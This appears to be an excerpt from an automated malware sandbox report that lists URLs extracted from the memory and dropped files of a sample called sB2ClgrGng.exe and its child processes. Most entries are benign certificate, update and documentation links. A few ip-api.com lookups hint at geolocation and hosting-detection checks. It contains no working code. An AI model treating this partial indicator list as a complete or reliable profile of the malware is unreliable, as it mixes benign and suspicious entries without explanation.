00000001.00000002.2191037746.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1825104762.00000281AC05D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: powershell.exe, 0000000D.00000002.2058156189.0000024647190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: svchost.exe, 00000020.00000002.3494718781.000002224EE00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000002.2205989359.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: _hashlib.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: sB2ClgrGng.exe, 00000001.00000003.1769914240.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1778040329.00000281AB656000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1781566616.00000281AB6D3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1770763715.00000281AB96D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F04D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: word.exe, 00000055.00000002.2087146224.0000000000F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
                      Source: sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF2E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186967243.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABF13000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                      Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                      Source: sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF2E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186967243.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABF13000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189091027.00000281AB920000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
                      Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: sB2ClgrGng.exe, 00000001.00000003.1833375883.00000281AC05E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184795367.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164662200.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2166231720.00000281AC04B000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2191095661.00000281AC069000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894131377.00000281AC066000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031560743.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1920331178.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2187571679.00000281AC068000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1825104762.00000281AC05D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1823342722.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1893801082.00000281AC04F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://logo.ver6
                      Source: powershell.exe, 0000000D.00000002.2036783032.000002463EB07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1942613111.000001F2267FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1994798538.000001F234F0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000002.2205989359.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000002.2205989359.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                      Source: powershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                      Source: powershell.exe, 0000000D.00000002.1951924789.000002462ECB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 0000000D.00000002.1951924789.000002462EA91000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 0000000F.00000002.4216648760.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1942613111.000001F224E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000D.00000002.1951924789.000002462ECB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
